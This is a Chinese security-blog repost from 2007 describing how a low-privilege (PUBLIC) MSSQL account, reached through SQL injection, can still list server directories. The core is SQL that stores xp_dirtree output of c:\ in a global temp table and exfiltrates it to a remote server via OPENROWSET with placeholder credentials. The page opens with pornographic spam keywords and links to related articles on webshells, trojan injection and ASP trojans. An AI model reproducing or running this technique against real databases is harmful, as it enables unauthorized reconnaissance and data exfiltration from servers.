欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法

 更新時(shí)間:2007年10月08日 22:50:16   作者:  
軟件作者:kj021320
信息來(lái)源:I.S.T.O技術(shù)團(tuán)隊(duì)(http://blog.csdn.net/I_S_T_O/)


本來(lái)這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個(gè)小部分,可惜寫(xiě)了好久資料收集了好多但是估計(jì)年底都沒(méi)能出來(lái)~那就先發(fā)出來(lái)了!主要是MSSQL2005都來(lái)了!2K的話(huà)沒(méi)多久就會(huì)給淘汰了~拿出來(lái)跟大家交流吧~廣告說(shuō)完了...

正文:

提起public權(quán)限的用戶(hù)估計(jì)很多人也覺(jué)得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長(zhǎng)-_-!!!),里面說(shuō)到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲(chǔ)過(guò)程,原因是public沒(méi)有辦法建表,我在這里矯正一下其實(shí)public是可以建表的~呵呵,使這些存儲(chǔ)過(guò)程能利用上,看下面的代碼吧

--建立一個(gè)臨時(shí)表,一般的表我們是無(wú)辦法建立的,我們只能建立臨時(shí)表

create table ##nonamed(

       dir ntext,

       num int

)

--調(diào)用存儲(chǔ)過(guò)程把執(zhí)行回來(lái)的數(shù)據(jù)存到臨時(shí)表里面

insert ##nonamed execute master..xp_dirtree 'c:\',1

--然后采用openrowset函數(shù)把臨時(shí)表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是說(shuō)public可以遍歷用戶(hù)服務(wù)器的目錄 具體有什么利用價(jià)值嘛~呵呵見(jiàn)仁見(jiàn)智了 


Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964

相關(guān)文章

  • 利用css實(shí)現(xiàn)掛馬的代碼

    利用css實(shí)現(xiàn)掛馬的代碼

    本站只是提供知識(shí),方便大家以后的查殺木馬,不是用來(lái)搞破壞
    2008-01-01
  • 非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)

    非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)

    簡(jiǎn)單的說(shuō)來(lái),webshell就是一個(gè)asp或php木馬后門(mén),黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門(mén)文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。
    2008-06-06
  • phpMyAdmin 后臺(tái)拿webshell

    phpMyAdmin 后臺(tái)拿webshell

    phpMyAdmin 后臺(tái)拿webshell...
    2007-03-03
  • 讓你變成ASP木馬高手

    讓你變成ASP木馬高手

    這篇文章主要介紹了讓你變成ASP木馬高手
    2007-01-01
  • 最新評(píng)論